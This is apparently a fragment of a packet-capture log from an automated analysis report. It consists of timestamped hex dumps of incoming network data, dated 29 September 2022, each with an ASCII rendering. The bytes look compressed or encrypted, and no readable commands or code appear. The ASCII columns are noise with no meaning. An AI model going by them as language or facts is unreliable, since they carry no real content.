                                                                                                        2022-09-29 12:45:44 UTC4299INData Raw: 77 c2 b4 c4 c3 15 4f 50 14 f3 84 3e 5c 20 7f a2 8d 4b 0d 79 fe 04 10 81 b5 e3 28 36 7c dc 6d 93 01 38 c2 9d d0 3a f5 11 14 cd ed c5 ab eb c8 b7 50 dd 02 bc 0d 2f cd 0f fe 43 1f fa 5f 7f df c8 24 c3 7c 51 9b 1f bb af dc 7c 35 85 11 10 6a 37 91 97 92 ec 4c cf 5d 29 6e bd 62 e4 d0 52 46 11 b8 2d 3e f2 63 06 c1 e5 2c 99 10 31 76 d5 04 cd a6 b5 4e 5e 96 83 93 48 05 1a 09 e0 14 23 08 c5 5a 7e 5d d5 bc aa 07 53 33 0f 23 dc 11 c0 9c cf c3 29 ac b9 d0 0e 58 7b 8b 87 9f 5c f9 b8 79 b0 12 a1 0b 13 c1 2b c4 6f a7 0a 51 c8 8b d2 a7 7e 67 4b ee 82 4c 11 09 0b a7 a7 d2 f2 ce 70 a0 23 2e fc 40 36 e8 38 75 cf c2 c9 12 97 85 ae 1d 78 4e 7e 9b 25 4e 75 b3 b7 74 cb c5 df af 62 df 2b d0 9c 92 65 c2 25 21 5a 19 36 f4 c3 59 59 04 ac 82 3e b0 d8 62 2d 6c 94 a1 2f 15 01 8f 38 b3
                                                                                                        Data Ascii: wOP>\ Ky(6|m8:P/C_$|Q|5j7L])nbRF->c,1vN^H#Z~]S3#)X{\y+oQ~gKLp#.@68uxN~%Nutb+e%!Z6YY>b-l/8
                                                                                                        2022-09-29 12:45:44 UTC4315INData Raw: 18 07 17 82 b9 49 20 22 00 fa af 51 04 e9 1f 81 57 eb 48 e3 b4 63 89 ab 8c 8e 1b 08 01 f2 51 cc a4 4b e4 22 59 3d ce 87 ba f2 8c 92 93 af ff 70 29 9b 33 c2 8b 05 ba 9f 42 a6 5a dd e2 e4 da f6 9e da 48 40 26 3d d3 ad 95 6e e5 55 e6 e5 a3 14 ec 4e b8 45 52 6e eb fb 20 15 61 dc 2b db e2 9d 92 ef cf 8d 39 f1 40 f0 3b a3 a9 33 87 63 cc 5d 68 4f 4e 32 1c 85 87 b2 df 57 4f a1 fc 05 a8 d6 de 38 27 8e 61 1e 9e 16 67 2d f9 d1 28 54 08 06 f1 43 02 9e 0c a9 da b4 55 cb 2f 20 7f 7a b8 42 24 a8 13 91 0c 1e c9 b4 ba 29 ac e3 f7 26 e3 e7 82 ac 6c dd 61 f9 0f 53 a4 ad 16 2d 24 68 bb fb a2 3f f3 2d 8a 3f 62 3e 55 db c9 01 95 fa 71 df f9 ef ec 7d 32 95 db cb 3e d2 5a 40 57 27 1b fd a1 5d 97 c1 5f 45 7a 2a 9b 33 bc 28 c7 1d eb 94 39 f4 98 2a c7 5a fd c2 1a b4 2d 44 23 ca 6b
                                                                                                        Data Ascii: I "QWHcQK"Y=p)3BZH@&=nUNERn a+9@;3c]hON2WO8'ag-(TCU/ zB$)&laS-$h?-?b>Uq}2>Z@W']_Ez*3(9*Z-D#k
                                                                                                        2022-09-29 12:45:44 UTC4331INData Raw: 63 6e 70 73 3b 59 da b2 be ff a8 cc 77 3f 20 98 76 15 f3 53 8b da ec 9e 60 62 d1 55 4b 83 1c ca 93 76 63 9f 9b 0d 16 f3 d4 51 83 9c 52 2a 0a 23 ad 17 c2 ff 62 c4 e8 dc 61 d5 18 54 0a bf 8d 35 05 2b dc 3a 2f 2f 95 dd 02 60 92 6a 38 e1 9b f4 7b 38 4d 47 83 6a f1 bf f3 ab ad a4 1f 17 61 b6 80 0e f2 3e 2d 99 0c 2a cc 16 a5 86 2b 91 25 87 d1 f3 78 68 b8 3b 6e 0c d1 43 ef c6 39 a1 e6 46 9a 61 45 03 49 7e 3b ab f5 1c 98 ea 9a 40 34 76 3e 5f 1d aa 48 83 b4 15 18 d1 04 9a 58 ad 38 5a d6 06 62 a4 8a de d3 39 16 60 77 60 67 4a 5e 21 57 fe f2 79 c3 6c c3 3e 2b 51 47 d2 1c 25 80 73 c3 bd 4c 08 a0 21 46 43 00 79 9c ad ac de 14 8c b1 aa 4c b5 15 41 37 b1 ac f2 cd 82 08 94 b8 f2 d5 c0 43 fb 25 9c 22 99 fb fd 72 c5 40 af 1a 92 04 76 e7 fe 57 4e 9d fd f7 af 5f 71 81 a9 6f
                                                                                                        Data Ascii: cnps;Yw? vS`bUKvcQR*#baT5+://`j8{8MGja>-*+%xh;nC9FaEI~;@4v>_HX8Zb9`w`gJ^!Wyl>+QG%sL!FCyLA7C%"r@vWN_qo
                                                                                                        2022-09-29 12:45:44 UTC4347INData Raw: 0b a1 c9 b2 7f 56 8d df e1 4b 65 c7 2e ad 9a 40 bf e6 88 56 d5 c3 98 d7 8e 6b 2a 8b 88 32 d8 9d 23 5f 2c 0e 7d af 1c 08 85 7c d2 71 56 d5 9e f8 d8 f0 cf 1e 19 3b 3b c9 cc ed 04 d8 50 23 fb e3 1a 65 32 14 ec da c1 a4 86 ba ef cc f9 5b 0c 08 94 20 9f 70 56 7a a8 69 b0 32 57 d9 25 45 83 6b 91 c0 5f 0c d9 ed 07 51 76 fe f6 1f 04 ce a2 df fe 75 6e 86 26 b7 89 bb b0 cb 6f 21 d5 2d 81 f2 f8 4e 03 bc a1 67 00 50 9a 88 fc 30 ac 52 7e e8 2d 80 39 63 64 81 18 cf a8 1c 94 4d 4b a2 57 f7 04 f7 55 85 d8 f5 0f a9 a6 f0 44 b1 4c bf 8e 2b f2 49 3c 9f 0e c7 fb 0c ea fa 05 d7 b3 46 1e 8a af 82 36 33 ca b9 7e 40 ae 27 54 25 f1 d4 34 5b af c2 73 2f 72 6b 51 a0 5c 18 52 da ba b7 f0 17 df ac 63 f1 fd 25 f8 4a 23 c2 18 58 c1 dd ca 59 e2 60 3b 2c 47 5f 4a d2 56 46 86 01 1d 8c 45
                                                                                                        Data Ascii: VKe.@Vk*2#_,}|qV;;P#e2[ pVzi2W%Ek_Qvun&o!-NgP0R~-9cdMKWUDL+I<F63~@'T%4[s/rkQ\Rc%J#XY`;,G_JVFE
                                                                                                        2022-09-29 12:45:44 UTC4363INData Raw: f8 98 f5 ed 6e 7a 4c d2 33 c9 d2 04 0e 0f c0 fe 52 18 5f 54 23 c5 f5 d4 a0 cd 19 b2 ef f2 4c 20 76 78 81 e8 35 40 a5 81 97 f3 fe 35 35 ec 11 37 09 6e c3 6f 29 d4 85 22 1c ef 95 6a aa 5e d7 fa d4 6d df d9 a9 ba 40 04 51 20 b8 4b 24 46 4f 59 c1 b6 0c c3 ef 1d 5d a5 c3 95 d3 19 b5 cf 7d ab c2 4c 9b 6f 41 fe 51 bf 7a 7b 8f 85 b7 73 b9 64 3f 2c 5b 23 64 ed d7 f5 3d 7c 90 07 4a bc 90 45 ed 95 8b d9 e3 cf 7c 67 6d d2 a3 da 36 4f b3 79 ec b7 3d 68 2e 68 31 95 3a 1c fd f0 31 6f ed d2 3c a1 d9 27 97 d0 b0 dd e0 bc d6 08 0b 0a 79 56 ae 3c c0 6c 9e 60 09 df bc 38 63 62 9c 41 94 ce 07 08 18 08 b0 bd 45 28 9e d0 d8 9d 0b 4e f3 a3 a6 d4 aa 6a 67 25 1a 53 f2 4d 65 80 8e aa 1f f3 1a 26 57 35 3b b8 14 3c af 98 9f c2 82 ea 6e 59 87 eb 6c ae ef 43 47 af 44 96 41 fe 22 aa 97
                                                                                                        Data Ascii: nzL3R_T#L vx5@557no)"j^m@Q K$FOY]}LoAQz{sd?,[#d=|JE|gm6Oy=h.h1:1o<'yV<l`8cbAE(Njg%SMe&W5;<nYlCGDA"
                                                                                                        2022-09-29 12:45:44 UTC4373INData Raw: 90 e7 5f 34 0b 67 89 b1 b4 5e 5e 1e 46 89 92 b8 84 cf 36 c6 68 f9 1b 37 63 72 c4 81 63 82 6f 79 8f c8 4f 0c d5 eb 6c 6d 8d 0c 34 24 a9 86 7a ec d5 f9 be 5c 7f c5 5e 05 a5 41 c8 b9 4b e9 42 6b 66 16 cf 4f 11 1e 03 b4 d9 57 6c 35 51 51 24 10 22 17 e7 18 ed 12 8d ae 4b 18 ef 74 af ea ae 33 70 cd 77 c9 fe 7e 55 9e 79 31 39 88 5b 26 02 59 2a a7 8d e5 be 58 08 bb 68 5d 69 83 eb f1 f4 a3 96 b3 e9 16 db 76 dc 16 fb 60 c6 62 83 e5 c4 b9 ac ba 3c a0 97 d0 fc df 98 8b a9 0e da fb 9d 9d 0c b6 8a 04 14 14 16 72 f1 e5 de 56 f6 5e f5 0c 3b d4 e2 12 80 93 68 bd b9 37 58 13 7a 63 c1 48 bd ed d4 0d 04 b0 7d 83 99 d4 39 bc 0d e3 dc ec 70 7d 36 9c f6 d5 1d 36 68 d4 08 e0 38 aa 4f 87 56 8b fe 61 2c d3 54 01 81 81 9f 77 b7 89 1a f7 69 34 fb 98 6f 6b 3a 9f c3 4f 10 18 8f 83 e8
                                                                                                        Data Ascii: _4g^^F6h7crcoyOlm4$z\^AKBkfOWl5QQ$"Kt3pw~Uy19[&Y*Xh]iv`b<rV^;h7XzcH}9p}66h8OVa,Twi4ok:O
                                                                                                        2022-09-29 12:45:44 UTC4389INData Raw: a4 66 f5 fa f3 7d 80 09 96 94 76 a1 33 bc b5 87 24 6a be 57 1d a5 b1 91 9f 84 14 4a 93 04 6c 1f 94 9f 59 06 6e 2a 38 5f de cc 41 6e af 51 e2 c8 74 c3 d9 7e 92 f0 5c 54 73 5d 36 85 76 bd 11 ed 97 39 59 38 9a 23 5d f5 92 fa af e7 20 60 c0 9d 42 19 2d 75 10 3e ff e8 96 64 2b 7f b8 1c 45 c3 66 26 88 51 3b 4b 14 8b 90 4d a3 d2 59 dc f8 a8 3a ae 22 44 ca 52 38 a0 ff 35 fd c3 71 76 0d db 5c 87 29 bc 3b 10 aa 72 bb 31 c3 91 ef 27 40 35 0d 1e b4 d9 7e 6e f9 0d de 37 21 27 02 26 e7 54 54 53 2a 32 00 d5 6d b6 15 fa 12 a4 9e 32 05 6e ce a4 d7 72 b3 87 9e 9f d8 6d 25 4b e7 ec fb cb 7a 23 f6 ba 77 8f bd fa 82 e8 b0 7e 9b 12 eb 62 85 f9 89 01 de f0 02 d1 a1 99 0c 71 65 c7 bd 12 04 28 40 91 7b 90 38 02 50 b5 ba 95 a9 d3 be 2a 42 5b 40 bc 15 b1 6c 25 d5 e9 c8 87 75 77 e4
                                                                                                        Data Ascii: f}v3$jWJlYn*8_AnQt~\Ts]6v9Y8#] `B-u>d+Ef&Q;KMY:"DR85qv\);r1'@5~n7!'&TTS*2m2nrm%Kz#w~bqe(@{8P*B[@l%uw
                                                                                                        2022-09-29 12:45:44 UTC4405INData Raw: 81 f1 97 bd 62 e3 f7 9c 9f a8 b2 75 e6 31 dd f8 e9 c6 2e c3 5d 93 24 ee b5 98 47 45 38 dc 73 da f1 d7 20 d8 4d 99 38 25 dd 91 b9 70 be 9c da 22 87 52 27 b5 08 aa 14 7e 40 87 7b 33 5d 88 dd da 0d e9 3c 08 c2 40 4f 3f 26 3c 2c 04 e5 6b a7 0a a4 5e 70 79 4b 48 08 5e b8 c9 c6 bd 0a e7 10 64 0e 21 31 68 15 84 db ff 60 c1 95 aa bb 86 e9 0b e3 d6 28 1b cf ca 00 12 fa 49 a7 28 92 be df 50 4e 86 d1 8a c8 15 92 67 1e c8 ad 7d d7 a4 29 c2 94 1f ea f3 07 51 f3 35 e3 7e c0 97 ad 5b 05 60 ac f9 9c 9b a5 00 0b d9 37 0b 4c 50 3e ac 0f 39 78 87 2e 56 3a 7d 67 95 ee 62 c0 df d0 45 cd f9 22 95 6a c9 f6 d3 1b dd fa 1a 0c 62 7a ff 81 87 b2 08 76 5b 7b ee 64 ab 53 5f 8b f6 47 b8 cf ca c1 15 f8 1d 96 9f d8 94 a8 b1 b4 86 68 54 b3 69 c1 f7 d4 95 ae 3a 37 50 06 19 22 d8 f1 11 73
                                                                                                        Data Ascii: bu1.]$GE8s M8%p"R'~@{3]<@O?&<,k^pyKH^d!1h`(I(PNg})Q5~[`7LP>9x.V:}gbE"jbzv[{dS_GhTi:7P"s
                                                                                                        2022-09-29 12:45:44 UTC4421INData Raw: 9d dc 9d a5 8a 2e 4c 2f ed f8 c3 97 09 c2 d0 96 bd 55 19 09 1e c4 6e ab 3c 0c 78 35 fe 74 51 33 7a c7 91 88 35 ff b0 7b 0d ba a3 a1 4e 1b c3 40 c6 79 b3 58 4b 68 a3 47 84 db b9 b2 0a bb 46 e4 fd fb 49 2b a8 8b 81 ad a5 b0 01 77 50 fb 88 9e f3 66 28 3b 30 84 c8 01 96 0a 66 2d 1b d4 00 a0 43 f9 4a 0f 06 0b ed d7 3d 65 57 76 66 ac 0a 9c 74 73 24 68 33 09 58 22 ec 04 81 24 cf 71 bf 86 40 b9 1d e1 3e e9 f1 2b e5 10 d7 bd 54 db 35 aa 49 41 8c 3f 8d f4 60 9e 5e 18 4e 16 dd 7d d0 a0 18 05 86 33 34 dd 56 55 b6 a5 9d ef f2 d2 94 3b 01 59 ac 70 dc aa 72 e8 8f ae 1b c2 e0 cd c5 1d 94 c8 40 62 e9 5d a8 ff a0 fd ff 07 e7 a6 41 18 1c 65 fb a5 6f 29 cf 0a e8 1b 0a 2f bb 3f fd 09 19 9a fc 3b 54 67 01 f9 1e df f1 4c da 58 72 48 61 3b 10 6e 63 a2 16 69 2a 35 e5 f6 7a 2b 35
                                                                                                        Data Ascii: .L/Un<x5tQ3z5{N@yXKhGFI+wPf(;0f-CJ=eWvfts$h3X"$q@>+T5IA?`^N}34VU;Ypr@b]Aeo)/?;TgLXrHa;nci*5z+5
                                                                                                        2022-09-29 12:45:44 UTC4437INData Raw: 36 bb fd 3b f0 96 b4 ce 21 dc ed 5b b3 6f 9e 0d 4d 49 5a ac dd 7e bb 19 c1 cc 8c 4f 37 a2 c6 55 57 b9 1a ee 91 a4 83 60 a0 a8 22 da 1a de 15 57 5f 00 f0 a3 87 fd 39 94 c5 bb 16 4b b4 fd 26 c9 bf 60 54 cc 0c 03 04 04 9a 22 62 48 28 d6 1e 26 75 a7 fb a0 a8 47 2b 2e 1d 7f 5f ee dd 5d b2 3e 5b 57 3d eb 01 33 45 f4 f1 22 16 ab fb 85 d3 b5 0c 0a 52 f6 82 e3 4b bc c2 31 10 ca ad 85 b6 fd 3d e3 b6 ee 28 44 4c 22 e5 c1 f0 5f 94 59 a9 3c 47 68 5d e2 21 b0 d1 c6 48 ee f7 24 a4 09 69 95 52 98 65 48 e1 07 8f 12 77 68 67 4e b0 12 e2 99 3b 02 de fb 93 08 e6 2e da 38 fd 78 ee f7 07 0b 83 c2 19 48 aa 01 e7 44 a6 21 89 1c c3 18 4f 86 68 5c d2 1f 4e 67 51 d3 ab 16 71 7d a1 e5 ec ae 32 62 11 0d c9 ac b0 51 ef e3 6d 18 d1 87 8c 3c 05 f8 54 59 e4 10 53 00 37 b4 ff 3f 18 9a 0c
                                                                                                        Data Ascii: 6;![oMIZ~O7UW`"W_9K&`T"bH(&uG+._]>[W=3E"RK1=(DL"_Y<Gh]!H$iReHwhgN;.8xHD!Oh\NgQq}2bQm<TYS7?
                                                                                                        2022-09-29 12:45:44 UTC4453INData Raw: 69 d1 6d 2e 55 93 28 21 18 f9 e1 a0 c4 a2 6b c2 31 cd 01 e4 d7 d9 f3 9d 74 49 46 1c cc 54 41 42 1a c1 63 74 b3 4b 87 ca 3f ff 4f 5b 34 50 3d 74 cc 30 ee 61 e9 03 ca 07 34 a5 b7 9d 43 e7 b2 24 a7 1b 46 58 cc 25 98 bb 27 1d 0c 4f 0d d6 5c 2c b0 3d bf 82 36 19 e9 92 b8 f4 45 f8 25 8f 90 e4 13 22 54 bd c4 d4 a4 ea 57 93 6e cb 3d d6 75 52 71 1b ed f3 b0 6e de ec dc a0 e9 7d 2a a7 b0 62 67 b3 24 3a 11 9d 24 e0 09 7d 39 33 70 86 43 af b7 a3 cd 44 86 ca 79 65 54 95 8e a6 0a cc 44 ec 1f 3a 86 b4 bf b2 3f be 3e 85 c5 f4 3c 84 f1 e2 e5 20 bd 4b a6 b2 04 36 8b a0 75 d7 65 76 1b 80 ab 3c d3 f8 a6 26 7e 74 6a e7 30 8f 06 3d 83 e5 1f 5d 01 b4 80 7a 63 f9 e9 a6 7d 32 b3 61 a9 81 48 2f b2 6d d1 98 95 56 6d f0 ca 10 64 fe f1 07 e7 fd 84 e3 b3 b0 05 a1 22 5a 48 e2 62 17 c5
                                                                                                        Data Ascii: im.U(!k1tIFTABctK?O[4P=t0a4C$FX%'O\,=6E%"TWn=uRqn}*bg$:$}93pCDyeTD:?>< K6uev<&~tj0=]zc}2aH/mVmd"ZHb
                                                                                                        2022-09-29 12:45:44 UTC4469INData Raw: af d3 14 eb ae c5 68 80 00 28 be 06 2e 86 5b 1e c0 ef 0a 15 8a bc 55 cd b9 26 22 72 21 00 a0 f2 0c 03 5a cb 62 56 53 97 c3 1f e2 10 d9 59 f0 a4 26 e5 22 c2 04 d9 a8 9a 0d 77 b3 d2 c7 f8 ea 5d 3b 74 e9 fa da 37 a8 66 a3 17 88 78 3a 03 0b af 7a 2f 6a 9c 22 ea 50 66 11 5b f9 2f 61 fe 05 ca 99 30 0b 43 21 03 c2 9f 76 16 fe 62 3e 21 18 7e d9 2e 54 55 57 ac cb 68 66 6b a3 51 a2 6d 05 ee ae 40 b3 52 7d 70 42 d7 e0 ca 42 a5 82 c0 ff 79 6e 86 eb 05 dc c7 49 75 0d f3 e9 10 9f 53 ec 7f b7 f4 d0 b2 90 45 a1 e6 89 17 2a 89 81 ca 78 b0 69 25 be b4 ee 71 82 af 23 44 f9 9d d5 9a 9c 50 ab d4 91 a3 7a 88 de 98 48 82 93 07 d0 bd 39 d5 b6 78 d4 28 2d 74 c9 02 db 30 a3 e6 00 10 43 d9 f9 e6 68 d0 b6 b2 98 07 34 82 af 38 b9 33 d9 74 e0 71 54 6c 09 36 0b 3c 11 7e ae cb 6c e8 75
                                                                                                        Data Ascii: h(.[U&"r!ZbVSY&"w];t7fx:z/j"Pf[/a0C!vb>!~.TUWhfkQm@R}pBBynIuSE*xi%q#DPzH9x(-t0Ch483tqTl6<~lu
                                                                                                        2022-09-29 12:45:44 UTC4485INData Raw: ca ff 91 39 8d 0f a6 8d c1 c3 be 0a 77 77 6a d7 6c 4a d6 cc 2b aa 1b 9f f1 dd f8 97 40 a5 2d bb fa 0a 89 0f f9 8b 39 03 06 2d ba e4 80 46 4e fe 8d bf 90 a9 10 72 b4 7f a8 fc f3 0b ff e8 3e a1 1e 4e c5 41 95 e1 af 24 6a f7 fe 31 51 1d 50 96 4a 2e 0e 8a 21 66 15 37 46 ec b9 3f d0 a5 6d ec 72 7b b2 c5 cb a8 55 f5 87 94 cd 28 ec 5b 70 6c d4 19 b3 3e a7 b3 d2 19 16 c5 cf 6e 56 41 e3 98 68 0e 12 9a 02 cf 42 0a a7 50 b0 de 3b 1c 20 4a 07 3e cf ec 50 20 e5 78 46 8f 7e 24 17 62 d2 0a bf 22 37 64 78 48 d1 05 21 49 37 1f 43 51 48 2d c9 f0 1b ee 4b f0 7f 9b f5 e9 5b 67 92 ac 65 b7 e3 22 68 72 57 bb 91 f4 d9 57 7b a1 37 39 47 b2 d7 6d 68 82 cb 90 03 a5 1a f7 1c ad 9b d4 dd 4a 3b 9f 25 4b a5 b7 16 fb eb 35 38 8e c9 3a 24 d5 ab 5b 28 30 16 53 12 45 ce 97 6d b5 6f 25 f6
                                                                                                        Data Ascii: 9wwjlJ+@-9-FNr>NA$j1QPJ.!f7F?mr{U([pl>nVAhBP; J>P xF~$b"7dxH!I7CQH-K[ge"hrWW{79GmhJ;%K58:$[(0SEmo%
                                                                                                        2022-09-29 12:45:44 UTC4501INData Raw: de 63 2d 99 0a a5 32 a0 8a dd 0e a0 be 6b 0c 6e 6d d0 8c 1a 3c e4 19 75 d8 79 af cd 6f d3 f1 e4 7e d4 8f 8e ab aa 4c ec 68 0a ae 01 60 7e eb 86 bb b0 ff b0 40 f3 ed 21 01 0e bf 35 80 31 0e 9e 2f f5 b6 30 8d ab 4d f8 a1 5a 93 2d d8 8d 7a e7 9c 8c c0 74 b1 51 0c 5e 97 27 7c ab c5 77 b9 f8 a6 ff 91 99 46 ff 4c 40 01 20 3d 78 88 b3 53 0e da be 82 a7 87 d5 0e 61 dc 82 46 b1 e4 cf 54 33 80 20 7f 57 03 89 de ca f9 84 c7 3f 29 f1 44 57 5d 8b 02 8b 1d 54 9b f3 26 9a 22 d4 41 3d dd ca fb 0f 8a a2 b7 fe 7e 00 07 fb 29 2e 1b 13 ca f7 36 f2 05 03 77 cb 44 9e 83 98 95 76 71 c4 2c fa ff 9c 4f 5a 7a 6e fd 45 31 09 02 41 70 56 a9 56 75 32 32 42 53 e3 1c f7 e9 64 ea 30 6e 11 50 29 6b 8c da 52 22 02 a7 e6 dd 62 5d d8 73 a9 22 fb ca 01 f5 2c fb 14 f1 26 da 95 ba 05 95 8e e0
                                                                                                        Data Ascii: c-2knm<uyo~Lh`~@!51/0MZ-ztQ^'|wFL@ =xSaFT3 W?)DW]T&"A=~).6wDvq,OZznE1ApVVu22BSd0nP)kR"b]s",&
                                                                                                        2022-09-29 12:45:44 UTC4517INData Raw: 7c 46 e6 49 ed 88 75 ba fe fc 70 29 5d 74 0e d3 2b 7e 0a 5b 2e 9d 4e c5 57 82 f7 84 6c 23 4b 1a 7a 81 41 7e da e1 1b 56 48 a8 01 70 7a ef 04 13 5f 61 26 ee a5 8b 08 ed 29 dd 51 90 e2 92 51 a6 4c 5a f9 bf 20 08 cd 9a 09 ea 93 7d e1 55 00 83 cc db 3d e4 77 d1 ca c3 12 23 b7 ce 70 95 4e e6 54 68 ac 13 00 a0 b0 e2 9c 74 6e fc 86 b2 ee 34 fe ab 60 1a 1d f1 b7 f8 c3 9e af 1a 01 2b d4 c7 7f e1 8c 72 3a af bc 9a 14 43 23 2c e1 8d 04 5e 16 3f 30 4f 40 15 d0 7b 29 78 a2 82 ff 4d 98 f6 70 f1 a4 44 ff d6 0e c3 dd f6 d7 a8 9d d5 da 8a 1e 25 e7 a5 37 c4 1c 0a fc 6a 5d 60 a9 b2 01 0b e9 2e 4a 8b ce 3c 93 df 5e 6e bd 0c b4 3c 76 86 ea 5b 3f 32 a1 29 5d 64 6a 5c 68 a7 dc 68 6f b6 cf 8c 51 96 7d c5 b0 57 13 83 df c5 fa 41 9b 7d 69 2e 20 61 59 94 a1 8a 6b 2d 91 10 fc 28 8a
                                                                                                        Data Ascii: |FIup)]t+~[.NWl#KzA~VHpz_a&)QQLZ }U=w#pNThtn4`+r:C#,^?0O@{)xMpD%7j]`.J<^n<v[?2)]dj\hhoQ}WA}i. aYk-(
                                                                                                        2022-09-29 12:45:44 UTC4533INData Raw: 28 fe 06 8a f9 c4 58 3c 09 ef 02 d4 cc 6b 00 ef 84 78 6e fd e1 6c ef f7 42 68 04 cb cd b4 3d e2 d0 90 6b 13 6b d9 c4 de e3 b4 c9 a1 9a 9e 6d 2e 36 02 83 a3 87 27 0f d6 8b 91 e0 2c 4b 5b 9e 0a 8a 41 85 b5 7b 44 19 58 06 4e ad 35 68 11 ca 65 0e 7d 2c 12 f0 46 f4 e0 11 a8 52 74 5e a0 45 e6 86 9d 2c e1 8f f8 84 b3 31 9c e1 fe 65 b4 6a d9 0e 14 ba 7d 22 fa a4 c1 2e 6c dd d8 94 57 d2 ac 95 4f 6a be eb 62 eb 69 82 d4 f9 5b 25 08 a1 9c 9e a2 06 10 0d b5 bc 38 56 80 50 01 6c 93 26 33 a7 2a 57 d8 4e 2b 17 87 d9 4d a0 b3 66 c8 1a d7 8e a5 41 9e 9b 32 9e 39 b7 ee 63 e6 6c d9 d6 67 38 c4 43 bb b4 c0 18 c0 59 53 39 80 47 af 9b 5c 99 78 62 25 9d a0 be 7d 99 bd 99 78 99 a2 81 cc 52 10 92 7a 5d e2 95 54 db 2e 69 4b d1 c6 00 9c ed be fb 97 0d 60 3e 5c a2 14 35 7c bb f0 49
                                                                                                        Data Ascii: (X<kxnlBh=kkm.6',K[A{DXN5he},FRt^E,1ej}".lWOjbi[%8VPl&3*WN+MfA29clg8CYS9G\xb%}xRz]T.iK`>\5|I
                                                                                                        2022-09-29 12:45:44 UTC4549INData Raw: 1c cc 30 f7 87 33 72 74 19 be 8b 15 10 6c fd 99 40 ee 0a ce e7 a5 d7 25 e7 d0 3a 4e a5 76 25 e3 43 44 27 bb 3f b8 74 3f fa 37 61 10 95 9f 6a 2c bb c7 5f 70 98 be 9c 56 82 fd 50 7c 8d 52 d9 c0 9c 67 4d 36 59 f6 8f 47 0a ab cf db c3 bb a2 bf b6 94 8d 72 00 53 44 6d b8 3c 58 17 3b 4f c5 db 33 17 2a 3c 81 8e 5e 8b 6c 8d 6a ec 3c a3 c6 36 11 a3 cc 40 97 aa 10 5e a5 ff 55 c4 04 1c fd a1 7d 24 9f 1a a6 ae cd 12 45 de 6a 0b bb 4e 50 cf b9 ba 22 fd b3 8a bf dc f0 f7 28 00 39 0b e9 13 14 e8 f8 08 45 37 8b c5 cb 31 a4 03 20 f4 06 42 3b 3a 4a e2 de cf e3 32 93 f9 75 42 27 8c f1 b5 b5 82 9c 0d ab ec 6f b4 4e 26 8f 41 44 51 c5 26 69 e8 54 89 3c 3f 8e 7c ee 15 8c 80 60 b2 c9 ad c2 e2 ef 43 67 02 5e 3d c8 67 51 1f ad d2 8e af f8 e2 4f 0d 11 2d 7c 72 d1 44 22 30 23 bd 30
                                                                                                        Data Ascii: 03rtl@%:Nv%CD'?t?7aj,_pVP|RgM6YGrSDm<X;O3*<^lj<6@^U}$EjNP"(9E71 B;:J2uB'oN&ADQ&iT<?|`Cg^=gQO-|rD"0#0
                                                                                                        2022-09-29 12:45:44 UTC4565INData Raw: 07 90 41 d6 67 b8 ae 72 95 aa b4 db a9 1a 97 e5 31 39 c8 50 6b 11 18 91 7f fe c2 89 1c 56 dc 34 8a 2b af 8b f8 58 6a 7b db 6e d1 61 db c7 f9 36 e5 44 1c c8 ee b4 00 b6 66 3e 73 97 39 ad 29 e7 f7 f1 9c e5 56 d8 60 fa c9 b9 38 0b 19 d5 07 bf 0c 08 93 c6 71 77 1e c8 a2 89 70 9c 0c 61 1e 7f 84 f9 2e 5e f8 e2 88 9a e9 78 2c 38 6c d2 fc 0a 74 0d 26 5a 18 10 ac 5a 3d 31 f5 af d8 70 73 01 9b 0b 71 b6 3f 87 ee 8a 5b ff d2 ab 6b 37 d5 3a ed 56 50 06 b5 8d 0a 9e be c2 46 1c e6 5d 05 b8 dc bc ec 09 5b 63 dc 80 cb f7 e2 9e 4e f2 53 16 8d 8d f2 d8 1f 5a cf 4f 95 22 e0 41 a5 f9 9a 4d e1 e8 3f 2a 14 84 5d d2 29 5c fe 02 48 7a 23 17 76 4a 64 72 00 d1 de ed 5b e7 b8 a3 6c 88 ce fc f0 79 2c d6 5b 1a 4a 08 fc de eb f0 2d 4e fd e1 79 37 e1 50 84 b1 e0 60 3d ed e6 bd a9 c9 a9
                                                                                                        Data Ascii: Agr19PkV4+Xj{na6Df>s9)V`8qwpa.^x,8lt&ZZ=1psq?[k7:VPF][cNSZO"AM?*])\Hz#vJdr[ly,[J-Ny7P`=
                                                                                                        2022-09-29 12:45:44 UTC4581INData Raw: 84 bb 28 93 00 37 87 ae ea 44 ce 05 69 88 1d bd 9f db 13 24 78 28 b5 7f 75 14 db 55 f5 5b 95 3b 05 f1 62 06 86 28 e1 f1 66 5a 39 b2 d9 38 06 e0 07 d1 6e 1a 02 a2 49 e8 11 2d 50 61 d1 33 12 b0 30 63 ee 51 ab 32 e8 62 2c 7c 6c 70 35 33 80 f4 03 81 21 7d d2 e1 84 19 82 0d 14 a9 30 8a 00 7e 10 27 9a 80 b4 58 4a 1e ce 7e f5 15 71 43 e1 14 40 70 03 42 16 78 66 4e ed ab 18 7a e8 e2 c2 b0 8e e0 f6 9e e5 d5 f9 ac b1 b9 8b 6c c6 2b ba 45 32 70 90 96 a2 74 ef 44 d1 53 41 b1 6c 16 bc 36 d3 40 b8 a6 a4 64 af ee 67 1a 88 7d db 26 e8 f9 0b 0e e5 3e dd 5b 60 c1 9e d8 0a 73 0c ed 28 ec 96 6a b6 4d 84 ea 7e b1 c2 9f de 8a b7 3d ff f4 ff ad 13 73 9c dd 13 89 cd 87 36 c1 c4 c7 59 ad ef f8 49 5d f8 72 aa 7f 42 01 ae 86 eb 17 86 b7 0f c2 2e 9c ff c9 8f 32 6f dd 44 41 c6 5a 0c
                                                                                                        Data Ascii: (7Di$x(uU[;b(fZ98nI-Pa30cQ2b,|lp53!}0~'XJ~qC@pBxfNzl+E2ptDSAl6@dg}&>[`s(jM~=s6YI]rB.2oDAZ
                                                                                                        2022-09-29 12:45:44 UTC4597INData Raw: 53 f8 1d cb 7c 25 ae 57 b7 17 4e f6 8a 10 6c 38 f1 9c 1b 05 51 7d 27 b9 a3 07 15 83 c2 14 75 9d fc 73 5f 2c d1 54 cf ba 0f ff 97 71 91 30 a7 64 66 9f 90 98 7c 8d 0a db 71 97 d7 7c 3a 1c 36 2b 9d aa c6 af 1a 51 ad 2a 5c 0d 8c 2d a0 3b 30 31 89 72 fd 41 d5 7d 89 c8 69 55 b4 0d b0 13 08 bb e1 24 9e 43 2e 2c 4c 2f e5 4a f6 96 94 ac 45 b6 75 99 c1 68 dd 99 b0 96 be 01 07 2f f0 24 89 26 3e 07 4d aa 13 a7 d4 fd 98 79 28 e2 22 e9 90 3b 12 78 a8 ff e9 ca 75 7c 50 65 7f 38 f1 85 d5 0a 15 83 5c 1b 82 ba e5 a4 74 20 b1 46 78 7b 6d 10 8a 08 a0 09 16 c9 5d b7 b2 c4 fc f7 47 5b e3 cd 92 3a 5f 12 